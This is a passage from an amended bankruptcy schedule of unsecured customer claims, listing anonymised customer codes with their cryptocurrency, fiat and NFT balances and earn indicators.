| 07436544 | | CUSDT[1], DOGE[629.9041071], LTC[1.06290656], SHIB[3], SOL[.00001104], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07436552 | | SOL[0] | | |
| 07436556 | | BRZ[1], DOGE[0], NFT (516985546220773794/3D CATPUNK #6041)[1], NFT (522436774900853302/FTX - Off The Grid Miami #3707)[1], SHIB[3], SOL[0.00003900], USD[0.00], USDT[0.00002785] | Yes | |
| 07436560 | | SOL[.00297965], USD[2409.74] | | |
| 07436565 | | BAT[2], BRZ[1], BTC[0], CUSDT[5], GRT[2], SUSHI[0], TRX[4], USD[0.00], USDT[2] | | |
| 07436569 | | ETH[.0453569], ETHW[0.04535689] | | |
| 07436570 | | NFT (295046039088123892/Austin Ticket Stub #102)[1] | | |
| 07436576 | | CUSDT[5], DOGE[1], LTC[.0007812], TRX[5], USD[0.01] | | |
| 07436577 | | BTC[0.00004486], DOGE[0], ETH[0], ETHW[0.00059945], LTC[0], MKR[0.00030992], NFT (322897395915695357/00:Predawn Navy)[1], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07436582 | | GRT[74.24342597], USD[0] | Yes | |
| 07436584 | | CUSDT[2], DOGE[103.2175643], KSHIB[1413.07324495], SHIB[1329433.6612603], SOL[2.95190546], TRX[3722.42152943], USD[0.00] | | |
| 07436588 | | AAVE[.00334575], AUD[0.01], BRZ[1], BTC[0], CUSDT[1], ETH[0.00068608], ETHW[0.00068239], EUR[0.66], LTC[0], MKR[.0003995], PAXG[.00064404], SHIB[8.58988051], UNI[.03856095], USD[0.00], USDT[1.84270432] | Yes | |
| 07436590 | | SOL[0], USDT[0.00000012] | | |
| 07436591 | | BRZ[1], USD[0.00] | Yes | |
| 07436603 | | DOGE[.00189108], ETH[.60614063], ETHW[.60588615], LINK[38.88384022], LTC[17.33488398], SHIB[.00727057], SOL[56.00981332], USD[264.76], USDT[0] | Yes | |
| 07436604 | | CUSDT[2], USD[0.00] | Yes | |
| 07436606 | | USD[0.20] | | |
| 07436615 | | CUSDT[2], ETH[0], TRX[1], USD[0.00] | | |
| 07436616 | | BAT[2], BRZ[1], CUSDT[8], GRT[2], SHIB[1], TRX[8], USD[0.00], USDT[3] | | |
| 07436625 | | BTC[.00023391] | | |
| 07436627 | | USDT[1.903179] | | |
| 07436629 | | BCH[0], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00] | Yes | |
| 07436630 | | BTC[.00000559], USD[0.00] | | |
| 07436632 | | BRZ[1], CUSDT[6], DOGE[3], SOL[10.21176881], TRX[1535.88573993], USD[194.00] | | |
| 07436634 | | SOL[6.6], USD[3.26] | | |
| 07436635 | | BRZ[1], CUSDT[3], TRX[2], USD[300.01] | | |
| 07436638 | | AUD[0.00], AVAX[0], BTC[0.00007464], DOGE[0.86366881], ETH[0.00031945], ETHW[0], GRT[0], SOL[0.00420075], SUSHI[0], USD[0.00] | | |
| 07436652 | | BF_POINT[100], BTC[0], DOGE[0], SOL[0.00043116], USD[0.01], USDT[0.00000101] | Yes | |
| 07436654 | | USD[0.00], USDT[0] | | |
| 07436656 | | USD[0.01], USDT[0] | | |
| 07436657 | | BRZ[4], CUSDT[21], DOGE[3], GRT[1], USD[0.00], USDT[0] | | |
| 07436664 | | CUSDT[3], DOGE[0], ETH[0], SHIB[2], USD[0.01] | | |
| 07436670 | | BRZ[1], BTC[.00159459], CUSDT[4], DOGE[1], ETH[.04151817], ETHW[.04151817], LINK[2.65317227], SOL[3.87543023], TRX[646.08363057], UNI[6.19915326], USD[0.00] | | |
| 07436675 | | BRZ[4], ETH[.00000347], ETHW[.48030433], SHIB[1], USD[0.00] | Yes | |
| 07436676 | | USD[0.00], USDT[0] | | |
| 07436678 | | BAT[0], CUSDT[8], DOGE[0], LTC[0], TRX[4.02148976], USD[0.00], USDT[0] | Yes | |
| 07436682 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07436685 | | BRZ[1], CUSDT[1], DOGE[5], TRX[1], USD[0.00] | | |
| 07436690 | | CUSDT[3], DOGE[860.35972687], ETH[.08622463], ETHW[.08622463], TRX[1], USD[0.01] | | |
| 07436693 | | CUSDT[3], SHIB[1282932.90443806], TRX[2], USD[0.00] | Yes | |
| 07436695 | | CUSDT[5], TRX[5], USD[0.18] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07436696 | | NFT (29189326791958544/Air Maanz #7)[1], NFT (29369924488617384/Air Maanz #39)[1], NFT (29727046692633979/Air Maanz #41)[1], NFT (29891216920515689/Air Maanz #29)[1], NFT (31264255008560102/Exclusive 2974 Collection Merchandise Package #334 (Redeemed))[1], NFT (31520922754435400/Air Maanz #34)[1], NFT (32007568624090356/Air Maanz #47)[1], NFT (32543307108517201/Air Maanz #37)[1], NFT (32753469507325464/Air Maanz #40)[1], NFT (32922788152128459/Air Maanz #30)[1], NFT (33314984516222928/Air Maanz #15)[1], NFT (33326190333502061/Air Maanz #18)[1], NFT (33631276047493831/Air Maanz #14)[1], NFT (34345376312491150/Air Maanz #45)[1], NFT (36288154679868214/Air Maanz #49)[1], NFT (36310956745704577/Air Maanz #7)[1], NFT (36784533357844441/Air Maanz #35)[1], NFT (37097108756283919/Air Maanz #43)[1], NFT (37103066046711316/Air Maanz #16)[1], NFT (37633595601724000/Air Maanz #27)[1], NFT (40193870888785754/Air Maanz #9)[1], NFT (41653983041169212/Air Maanz #42)[1], NFT (41759246093051625/Air Maanz #28)[1], NFT (41889845759855578/Air Maanz #32)[1], NFT (42181769689683209/Air Maanz #44)[1], NFT (43213446640327765/Exclusive 2974 Collection Merchandise Package #426 (Redeemed))[1], NFT (43546608944988384/Air Maanz #11)[1], NFT (44567879086827564/Air Maanz)[1], NFT (45191378680743178/Air Maanz #21)[1], NFT (45313727265959523/Air Maanz #6)[1], NFT (45901066371426249/Air Maanz #8)[1], NFT (47117289723230015/Air Maanz #38)[1], NFT (48803523693820360/Air Maanz #46)[1], NFT (50010256471808693/Air Maanz #13)[1], NFT (50132164870134780/Air Maanz #52)[1], NFT (50696830920922349/Air Maanz #33)[1], NFT (51689808144122606/Air Maanz #22)[1], NFT (51746062104699246/Air Maanz #20)[1], NFT (52464052492705484/Air Maanz #48)[1], NFT (52797011958381328/Air Maanz #25)[1], NFT (53522799911413087/Air Maanz #23)[1], NFT (53730136795077280/Air Maanz #19)[1], NFT (53947529618913141/Air Maanz #53)[1], NFT (53957929618913141/Air Maanz #50)[1], NFT (55072976897140659/Air Maanz #12)[1], NFT (55222222736549943/Air Maanz #26)[1], NFT (55250130692710838/Air Maanz #4)[1], NFT (55482258905274347/Air Maanz #10)[1], NFT (56412893886605401/Air Maanz #5)[1], NFT (57461966939107317/Air Maanz #24)[1], SOL[0.002], USD[4.00] | | |
| 07436706 | | BAT[1.0165555], BRZ[3], BTC[0], CUSDT[36], DOGE[11.62720902], ETH[0], GRT[1.00404471], LTC[0], MATIC[0], SHIB[6], SOL[0], TRX[9], USD[0.00], USDT[2.14341028] | Yes | |
| 07436708 | | SHIB[20503.33758943], TRX[.04742387], USD[0.00] | Yes | |
| 07436709 | | BTC[.01886023], CUSDT[1], DOGE[2], USD[500.00] | | |
| 07436710 | | USD[0.00] | | |
| 07436712 | | BCH[0.03669747], DOGE[0], ETH[0.00498079], ETHW[0.00491542], SOL[.16449415], TRX[0], USD[1.33], USDT[0.00000001] | Yes | |
| 07436715 | | USD[0.00] | | |
| 07436716 | | ETH[.0000009], ETHW[.0000009], TRX[.000003], USD[0.70] | | |
| 07436718 | | CUSDT[1], DOGE[199.68498423], USD[0.00] | Yes | |
| 07436721 | | CUSDT[1], DOGE[362.5413109], USD[0.00] | | |
| 07436722 | | USD[0.00] | | |
| 07436723 | | LINK[.05913], NEAR[.0216], SOL[0], USD[30.55], USDT[2.5868469] | | |
| 07436726 | | CUSDT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07436727 | | BRZ[1], DOGE[0], ETH[.00000001], USD[0.00], USDT[0] | Yes | |
| 07436730 | | CUSDT[1], DOGE[699.68545804] | Yes | |
| 07436732 | | USD[40.00] | | |
| 07436738 | | USD[0.00], USDT[0] | | |
| 07436744 | | BTC[0.00009572], ETH[.5638335], ETHW[.5638335], SOL[8.839875], SUSHI[30.46865], USD[1.84] | | |
| 07436747 | | BTC[0], ETH[0], LINK[0], USD[0.00] | | |
| 07436749 | | USD[0.05] | | |
| 07436763 | | BTC[0], SOL[0] | | |
| 07436764 | | ETHW[.05093703], TRX[.000003], USD[0.01], USDT[0.00000294] | | |
| 07436767 | | AAVE[0], BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], MATIC[0], NFT (41899616603399469B/FTX - Off The Grid Miami #1406)[1], SHIB[2], SOL[0], TRX[0], USD[4.36], USDT[1.02335515], YFI[0], ZAR[0.00] | Yes | |
| 07436769 | | USD[0.00] | | |
| 07436771 | | CUSDT[2], USD[0.00] | | |
| 07436779 | | BTC[.0008461], DOGE[1], USD[0.00] | | |
| 07436795 | | DAI[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07436796 | | BTC[.00084061], CUSDT[4], DOGE[973.55983365], ETH[.00873901], ETHW[.00873901], TRX[218.34859681], UNI[.95176412], USD[0.00] | | |
| 07436806 | | BTC[.00101524], ETH[0], ETHW[0], SOL[0] | | |
| 07436808 | | USD[8.00] | | |
| 07436812 | | USD[0.74] | | |
| 07436831 | | DOGE[0], SOL[0], USD[1787.02], USDT[0] | | |
| 07436833 | | SOL[0], TRX[.000002], USDT[0] | | |
| 07436840 | | USD[0.00] | | |
| 07436842 | | USD[0.00] | | |
| 07436854 | | DOGE[1], ETH[0], ETHW[0], UNI[0], USD[0.00], USDT[0] | | |
| 07436857 | | BTC[0], SHIB[193.66556291], USD[0.00] | Yes | |
| 07436858 | | DOGE[1], USD[0.00] | | |
| 07436865 | | USD[0.00] | | |
| 07436866 | | CUSDT[2], USD[0.00] | | |
| 07436868 | | BCH[.01889227] | | |
| 07436873 | | DOGE[.05555775], USD[0.00] | | |
| 07436876 | | BRZ[1], CUSDT[4.00003058], DOGE[2], TRX[1422.73990036], USD[0.01] | Yes | |
| 07436880 | | USD[0.01] | | |
| 07436884 | | BAT[0], BCH[0], BRZ[3], CUSDT[6], DOGE[1], ETH[0.00000657], ETHW[0.00000657], LTC[0], SOL[0], SUSHI[0], UNI[0], USD[0.16], USDT[0.00000009] | Yes | |
| 07436885 | | ETH[.00046772], ETHW[.00046772], USD[0.00] | | |
| 07436897 | | CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07436904 | | BTC[.02626155], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07436907 | | BAT[12.73530705], BTC[.00117091], CUSDT[355.91618727], DAI[51.22400024], DOGE[2], ETH[.02421728], ETHW[.02391632], GRT[12.28210126], KSHIB[142.5702711], MATIC[27.51443457], SHIB[768801.57704315], SOL[.05978426], TRX[162.62097233], UNI[4.35127757], USD[57.66] | Yes | |
| 07436911 | | DOGE[102.65253113], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07436913 | | BTC[.00021313], CUSDT[4], DOGE[284.63965127], GRT[1.00498957], KSHIB[814.23050919], SHIB[407223.45867501], TRX[4], USD[0.01], USDT[0.00000001] | Yes | |
| 07436920 | | BTC[0], USD[0.00] | | |
| 07436922 | | BRZ[2], CUSDT[4], DOGE[2], ETH[.45902134], SHIB[3256466.71475068], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07436927 | | USD[35.00] | | |
| 07436929 | | BCH[0], BTC[0], CUSDT[4], DOGE[1], USDT[0.00038765] | | |
| 07436938 | | CUSDT[2], ETH[0], KSHIB[8.14121403], LTC[0], USD[0.00], USDT[0] | Yes | |
| 07436943 | | BTC[.00001234], ETH[0], ETHW[.95154301], USD[0.28], USDT[1.6042131] | | |
| 07436950 | | BAT[1.0165555], BRZ[3], BTC[0.00006582], CUSDT[36], DOGE[4], ETH[0], ETHW[0], GRT[1.00498957], SHIB[7], TRX[1], USD[0.00], USDT[0.00000057] | Yes | |
| 07436960 | | USD[1.98] | | |
| 07436962 | | DOGE[0], SOL[0], TRX[0], USD[0.01] | | |
| 07436963 | | BRZ[2], CUSDT[1], DOGE[5], USD[0.00], USDT[0] | | |
| 07436972 | | BTC[0], SOL[0.00611321], USD[0.00], USDT[0] | | |
| 07436974 | | USD[0.00] | | |
| 07436977 | | USD[0.01] | | |
| 07436982 | | USD[0.00] | | |
| 07436984 | | BTC[0.03183395], USD[-17.73] | | |
| 07436991 | | UNI[.067148], USD[0.00], USDT[.006231] | | |
| 07436992 | | BTC[.01286841], SOL[2800.08936339], TRX[2], USD[15.76] | Yes | |
| 07436999 | | DOGE[1.02452503], USD[0.00] | | |
| 07437007 | | LINK[0], USD[0.00] | | |
| 07437014 | | ETH[1.04934], ETHW[1.04934] | | |
| 07437016 | | CUSDT[1], USD[0.00] | | |
| 07437018 | | DOGE[1], TRX[1], USDT[0] | | |
| 07437020 | | DOGE[.00000362], LTC[.01199], USD[0.00] | | |
| 07437021 | | BRZ[3], BTC[0], CUSDT[34], DAI[.00259301], DOGE[1], MATIC[0], SHIB[2], SOL[0.00943501], USD[0.44], USDT[0.00000001] | Yes | |
| 07437023 | | BF_POINT[200], USD[0.06] | | |
| 07437025 | | SOL[51.10497995], USD[2.68], USDT[.6069486] | | |
| 07437029 | | DOGE[0], SHIB[6319674.53366983], USD[0.00] | | |
| 07437033 | | BRZ[0], CUSDT[2], TRX[0], USD[0.00] | | |
| 07437037 | | USD[231.50] | | |
| 07437044 | | DOGE[2], USD[0.00] | | |
| 07437049 | | BTC[.00137701], SOL[0], USD[4859.22], USDT[1192.56624000] | | |
| 07437050 | | BTC[0], CUSDT[1], ETH[0], LTC[.13854395], USD[0.88] | | |
| 07437061 | | BTC[0], SOL[0] | | |
| 07437062 | | BAT[1], BRZ[1], CUSDT[1], DOGE[0], ETH[0], TRX[3], USD[0.06] | | |
| 07437063 | | CUSDT[4], DOGE[86.49755524], TRX[1], USD[0.00] | | |
| 07437065 | | BCH[.02066664], BTC[.00582893], CUSDT[6], DOGE[1740.94572876], ETH[.15669323], ETHW[.15602267], GRT[49.98063502], TRX[44.82007376], USD[0.00] | Yes | |
| 07437066 | | USD[6.62] | | |
| 07437069 | | USD[0.47] | | |
| 07437071 | | NFT[459799473478045134/The 2974 Collection #1282][1] | | |
| 07437072 | | BTC[.00285752], CUSDT[3], DOGE[6.16313763], ETH[.16504486], ETHW[.16504486], TRX[1], USD[0.00] | | |
| 07437084 | | USD[0.00] | | |
| 07437087 | | BRZ[1], BTC[.0041862], CUSDT[6], TRX[345.08126208], USD[137.15] | | |
| 07437088 | | MATIC[34.37207284], USD[10.00] | | |
| 07437099 | | CUSDT[17], GRT[1], TRX[4], USD[0.01] | | |
| 07437102 | | BCH[.04541179], CUSDT[5], DOGE[365.92294445], ETH[.02178654], ETHW[.02178654], USD[0.00] | | |
| 07437103 | | BAT[.00004767], BRZ[1], CUSDT[2], DOGE[.00017982], USD[0.01], USDT[24.86763925] | | |
| 07437109 | | BTC[.00034115], CUSDT[1], DOGE[183.61736283], TRX[1], USD[5.00] | | |
| 07437110 | | USD[0.00] | | |
| 07437112 | | BRZ[5.14305796], DOGE[1], GRT[3.19497742], TRX[7], USD[0.00], USDT[1.11043116] | Yes | |
| 07437113 | | DOGE[.349], USD[0.00] | | |
| 07437115 | | BAT[182.641], DOGE[9.867], TRX[2385.108], USD[382.68] | | |
| 07437116 | | USD[0.00] | | |
| 07437117 | | LTC[.008], USDT[2.9846209] | | |
| 07437118 | | USD[35.25] | | |
| 07437120 | | BRZ[1], DOGE[1], SHIB[0], USD[0.01], USDT[0] | | |
| 07437123 | | BAT[0], BTC[0], DOGE[0], ETH[0.04396584], ETHW[0.04341824], SOL[0], USD[0.00] | Yes | |
| 07437126 | | DOGE[127.04521464], ETH[.048023], ETHW[.04742589], TRX[0.00002449] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07437130 | | AAVE[0], AVAX[0], BTC[.00000001], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], MATIC[0], NEAR[0], NFT (45183390511521850596/Saudi Arabia Ticket Stub #1112)[1], SHIB[878.13536963], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07437131 | | USD[2.08] | | |
| 07437135 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07437136 | | CUSDT[2], USD[0.00] | | |
| 07437155 | | BTC[0], CUSDT[2], DOGE[1], SUSHI[0], TRX[1], USD[0.00] | | |
| 07437161 | | USD[7.00], USDT[0.78018342] | | |
| 07437164 | | CUSDT[1], GRT[1.00498957], LINK[0], LTC[0], TRX[1], USD[0.00] | Yes | |
| 07437171 | | USD[50.00] | | |
| 07437178 | | SOL[0], USD[0.00] | | |
| 07437183 | | BTC[.00000003], DOGE[4], SHIB[17], TRX[3], USD[0.54] | Yes | |
| 07437184 | | BTC[.1013985], USD[11.40] | | |
| 07437185 | | DOGE[1], ETH[.06755519], ETHW[.06755519], USD[375.00] | | |
| 07437189 | | DOGE[.996], ETH[1.631367], ETHW[1.631367], LTC[.0075], SOL[2.988], USD[22.78], USDT[1.1350036] | | |
| 07437194 | | BTC[0.00002034], DOGE[1.878], ETH[.013], ETHW[.013], GRT[.958], LINK[6.22173847], SOL[280.28727176], USD[1804.73], USDT[0.92315218] | | |
| 07437195 | | CUSDT[11], DOGE[0], LINK[0], TRX[0], USD[0.00] | Yes | |
| 07437197 | | CUSDT[5], DOGE[1], TRX[3], USD[0.00] | | |
| 07437198 | | SOL[0] | | |
| 07437210 | | TRX[.000003], USD[0.00], USDT[0.00340015] | | |
| 07437212 | | USD[0.00] | | |
| 07437214 | | BF_POINT[200] | Yes | |
| 07437217 | | NFT (341883040627922338/Entrance Voucher #163)[1] | Yes | |
| 07437221 | | USD[0.52], USDT[0] | | |
| 07437231 | | BTC[.00093354], CUSDT[1], ETH[.01294355], ETHW[.01277939], USD[0.72] | Yes | |
| 07437233 | | USD[0.00] | Yes | |
| 07437236 | | CUSDT[1], DOGE[.00008411], USD[0.01] | | |
| 07437239 | | BTC[0], USD[93.04], USDT[0.00000001] | | |
| 07437242 | | BAT[36.19728598], BRZ[1], CUSDT[2], DOGE[4.04673648], GRT[72.92565904], SUSHI[15.20596413], TRX[1955.65008149], USD[0.01] | Yes | |
| 07437246 | | BTC[0.00003220], DOGE[3048.255], SOL[28.13238] | | |
| 07437247 | | BTC[0.00000002], ETH[0.00000004], ETHW[0], SOL[0], USD[0.00], USDT[0.00002442] | | |
| 07437252 | | BRZ[1], CUSDT[2], DOGE[1713.03706266], GRT[2], TRX[4], USD[0.06] | | |
| 07437253 | | BTC[.01441709], SOL[7.04633458], USD[0.00], USDT[0.00023389] | | |
| 07437254 | | BRZ[1], CUSDT[3], DOGE[2], USD[0.00] | Yes | |
| 07437257 | | TRX[.000004] | | |
| 07437258 | | USD[0.00] | | |
| 07437262 | | BRZ[1], CUSDT[5], ETH[1.33665087], ETHW[1.33608951], TRX[2], USD[0.00] | Yes | |
| 07437263 | | NFT (315047437953900978/Imola Ticket Stub #1358)[1] | | |
| 07437267 | | BTC[0], ETH[0], USD[0.00] | | |
| 07437271 | | CUSDT[1], DOGE[3], TRX[1], USD[0.00], USDT[380.86023184] | Yes | |
| 07437272 | | SOL[.001804], USDT[1.391909] | | |
| 07437276 | | USD[1.00] | | |
| 07437278 | | CUSDT[3], DOGE[108.97680156], LTC[.1082897], TRX[1], USD[0.00] | Yes | |
| 07437279 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.26], USDT[0] | | |
| 07437281 | | CUSDT[1.0001052], USD[0.00] | | |
| 07437293 | | CUSDT[5.09258355], DOGE[0], ETH[0], ETHW[0.04741197], KSHIB[0], NFT (337024221816802456/Entrance Voucher #2017)[1], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07437294 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07437299 | | DOGE[0], TRX[1], USD[0.00] | | |
| 07437303 | | BTC[.04] | | |
| 07437304 | Contingent, Disputed | USD[2.29] | | |
| 07437305 | | BRZ[1], CUSDT[6], DOGE[0], LINK[0], SUSHI[0], TRX[4], UNI[0], USD[0.01], USDT[1] | | |
| 07437309 | | USD[0.00] | | |
| 07437310 | | SOL[263.59820001], USD[6.41] | | |
| 07437313 | | USD[0.01] | | |
| 07437317 | | BRZ[3], CUSDT[5], TRX[1], USD[0.01] | | |
| 07437326 | | BAT[13.42482243], CUSDT[5], DOGE[44.8771657], ETH[.00334472], ETHW[.00334472], LTC[.05246746], SHIB[269348.17741066], TRX[1], USD[0.29] | | |
| 07437328 | | USD[12.88] | | |
| 07437329 | | BRZ[1], CUSDT[6], DOGE[.00002558], TRX[3], USD[0.00] | | |
| 07437330 | | BTC[0.34579728], DOGE[9858.246], ETH[.374727], ETHW[.374727], USD[4.04] | | |
| 07437335 | | BRZ[1.38387026], CUSDT[1], GRT[1.00498957], SHIB[5], TRX[2], USD[186.69] | Yes | |

Amended Schedule F: Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07437336 | | BAT[1.01183937], BRZ[1], BTC[.12346722], CUSDT[11], DOGE[173.1479686], ETH[1.36544357], ETHW[1.36493041], GRT[1.0036433], MATIC[1.0014814], NFT (502168467681394504/Coachella x FTX Weekend 1 #10686)[1], SHIB[815313.34780408], SOL[259.35854699], TRX[4], USD[0.01] | Yes | |
| 07437337 | | CUSDT[1], DOGE[.16615865], KSHIB[406.97167] | Yes | |
| 07437348 | | BRZ[1], CUSDT[0], DOGE[0], GRT[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07437355 | | BF_POINT[300], CUSDT[13], USD[0.00] | Yes | |
| 07437358 | | AVAX[8.0329927], BRZ[3], CUSDT[10], DOGE[13.7484699], ETHW[.11232316], GRT[685.6907719], MATIC[278.36607867], SHIB[507.89971346], SOL[14.1690716], TRX[2], USD[4269.20], USDT[.0045674] | Yes | |
| 07437361 | | BAT[1.01655549], BRZ[1], BTC[.06759943], CUSDT[13], DOGE[4.42794013], ETH[.13626327], ETHW[.13520208], SHIB[8], TRX[3], USD[0.00] | Yes | |
| 07437366 | | SOL[.05], USDT[2.101969] | | |
| 07437367 | | BAT[12.13514006], CUSDT[15], DOGE[4], ETHW[.155329], GRT[24.93146698], LINK[12.50584124], LTC[.00001035], NFT (458520225508507653/Anime #40)[1], SHIB[168.94107579], SUSHI[1.32306258], TRX[120.89970985], USD[0.00] | Yes | |
| 07437370 | | BTC[0], SOL[.04] | | |
| 07437380 | | USD[0.00] | | |
| 07437388 | | BAT[1], BRZ[1], BTC[0], SHIB[18], TRX[1], USD[1.91] | Yes | |
| 07437394 | | USD[0.00] | | |
| 07437404 | | DOGE[30.67449095], USD[0.00] | | |
| 07437407 | | USD[0.00], USDT[0] | | |
| 07437408 | | BRZ[1], CUSDT[6], DOGE[3637.61454092], ETH[.6918867], ETHW[.6918867], SOL[2.34295279], SUSHI[3.23087588], TRX[2149.10434529], USD[0.00] | | |
| 07437409 | | USD[3.98] | | |
| 07437411 | | USD[20.00] | | |
| 07437416 | | BCH[0], CUSDT[2], DOGE[1], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07437418 | | BTC[.00021662], ETH[.01158694], ETHW[.01158694], USD[2.19] | | |
| 07437423 | | DOGE[9.96], USD[0.01] | | |
| 07437426 | | USDT[5.59216] | | |
| 07437434 | | BTC[0], ETH[0], USD[0.01], USDT[0] | | |
| 07437447 | | DOGE[4.62309498], USD[0.00], USDT[0] | | |
| 07437448 | | BAT[1], BRZ[3], BTC[0], CUSDT[2], DOGE[1], USD[0.00], USDT[0] | | |
| 07437453 | | BTC[.98346479], CUSDT[2], DOGE[0], TRX[1.00002857], USD[0.01], USDT[0] | Yes | |
| 07437455 | | USD[0.01], USDT[0] | | |
| 07437458 | | BTC[0], DOGE[.686], USDT[.014712] | | |
| 07437463 | | BTC[0], USD[0.00] | | |
| 07437465 | | BRZ[1], CUSDT[4], DOGE[2], LINK[1.10614985], TRX[2], USD[0.00], USDT[1.10614985] | Yes | |
| 07437466 | | CUSDT[1], DOGE[.02402065], USD[0.00] | Yes | |
| 07437467 | | DOGE[0], USDT[0] | | |
| 07437476 | | ETH[0], USD[0.00] | | |
| 07437482 | | AUD[6.39], BAT[3.8504104], BRZ[11.17020522], CAD[2.48], CUSDT[142.36801686], DOGE[.9782667], USD[-3.47], USDT[3.9760399] | | |
| 07437485 | | BCH[.00074], ETH[.00020817], ETHW[.00020817], LINK[25.79520544], SOL[.0447], SUSHI[64.753], USD[1.68], USDT[0.00000858], YFI[.000996] | | |
| 07437486 | | CUSDT[2], ETH[0], TRX[1], USD[0.00], USDT[1.10860717] | Yes | |
| 07437487 | | USD[0.00], USDT[0] | | |
| 07437496 | | USD[0.01], USDT[0] | Yes | |
| 07437499 | | BTC[.0029459], SOL[125.319992], TRX[5621.373], UNI[.0824], USD[121.58] | | |
| 07437501 | | BAT[2.5019753], USD[0.49] | | |
| 07437505 | | BTC[0], DOGE[.2089], ETH[0], LINK[0.02522737], NFT (558550451568086648/Imola Ticket Stub #2061)[1], SOL[0], TRX[.000097], USD[0.01], USDT[0] | Yes | |
| 07437506 | | DOGE[.035], GRT[.004], LINK[.0568], MATIC[3.24], SHIB[13500], SOL[.00117], SUSHI[.376], TRX[.485639], UNI[.0512], USD[1685.77] | | |
| 07437510 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07437511 | | BTC[0], DOGE[0], ETH[0.02338205], ETHW[0.02338205], SOL[0], USDT[0.00001211] | | |
| 07437512 | | BAT[1], DOGE[.12412201], USD[0.01], USDT[0] | | |
| 07437513 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07437518 | | USD[0.00] | | |
| 07437519 | | BTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07437521 | | BTC[0], USD[0.00] | | |
| 07437525 | | BRZ[1], CUSDT[9], TRX[115.47330282], USD[4.70] | | |
| 07437527 | | SOL[0], USD[2.74] | | |
| 07437529 | | USD[1.97], USDT[0] | | |
| 07437530 | | BF_POINT[300], BRZ[1], BTC[.00727185], CUSDT[30], DOGE[3], LINK[20.8231225], MATIC[7.77936037], SHIB[11], SOL[0], TRX[3], USD[0.01] | | |
| 07437536 | | SOL[5.15361675], USD[167.65] | | |
| 07437538 | | CUSDT[2], TRX[349.95155625], USD[0.00] | | |
| 07437544 | | BTC[.00000002], USD[0.00] | Yes | |
| 07437546 | | SOL[52.85690040] | | |
| 07437551 | | USD[0.00] | | |
| 07437555 | | | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07437565 | | USD[0.06], USDT[0.00000001] | | |
| 07437566 | | DOGE[1], TRX[195.04694536], USD[0.00] | | |
| 07437568 | | BRZ[3], CUSDT[8], ETH[.00000109], ETHW[.00000109], TRX[3], USD[0.00] | | |
| 07437571 | | DOGE[0], USDT[0] | | |
| 07437574 | | SOL[.088] | | |
| 07437575 | | CUSDT[4], USD[0.01] | | |
| 07437579 | | BRZ[1], CUSDT[4], MATIC[0.00018459], SOL[.5528431], TRX[0], USD[0.00] | Yes | |
| 07437585 | | BTC[.0000335], SOL[.02686], SUSHI[.3534] | | |
| 07437586 | | USDT[0] | | |
| 07437587 | | USD[0.01] | | |
| 07437589 | | USD[0.05], USDT[0] | | |
| 07437591 | | BTC[.00004671], USD[0.00], USDT[0] | | |
| 07437598 | | DOGE[1743.43323465], SHIB[6927126.62787475], TRX[1], USD[0.00] | | |
| 07437600 | | BRZ[2], MATIC[0], SOL[2.05669902], TRX[1], USD[0.26], USDT[0.81325152] | Yes | |
| 07437609 | | BRZ[2], CUSDT[2], DOGE[9], TRX[1], USD[0.01] | | |
| 07437612 | | USD[206.55], USDT[0.77202374] | | |
| 07437615 | | CUSDT[.00035169], DOGE[1], MATIC[54.78860524], SHIB[1], TRX[2], USD[226.16] | Yes | |
| 07437620 | | BCH[.01801627], BRZ[1], CUSDT[16], DOGE[1], USD[0.01] | | |
| 07437627 | | CUSDT[2], USD[0.00] | | |
| 07437632 | | SOL[111.85643704] | | |
| 07437637 | | BRZ[3], CUSDT[.40008], DOGE[1578.30880946], GRT[1], TRX[.92807478], USD[190.00] | | |
| 07437643 | | BRZ[3], CUSDT[9], DAI[5.3890833], GRT[2.07674124], SHIB[2], USD[921.05], USDT[1.10562463] | Yes | |
| 07437646 | | BTC[.0002112], DOGE[365.532], ETH[0.80969284], ETHW[0.80969284], SOL[.00152566], USD[0.00], USDT[.0073702] | | |
| 07437647 | | CUSDT[4], USD[0.00] | | |
| 07437651 | | USDT[.048489] | | |
| 07437656 | | NFT (546253280272825324/FTX - Off The Grid Miami #4778)[1] | | |
| 07437657 | | SOL[0.00635249], USD[3.42], USDT[0] | | |
| 07437663 | | BAT[0], BRZ[0], CUSDT[1], DOGE[0], ETH[0], GRT[0], LTC[0], TRX[0], USD[0.00] | Yes | |
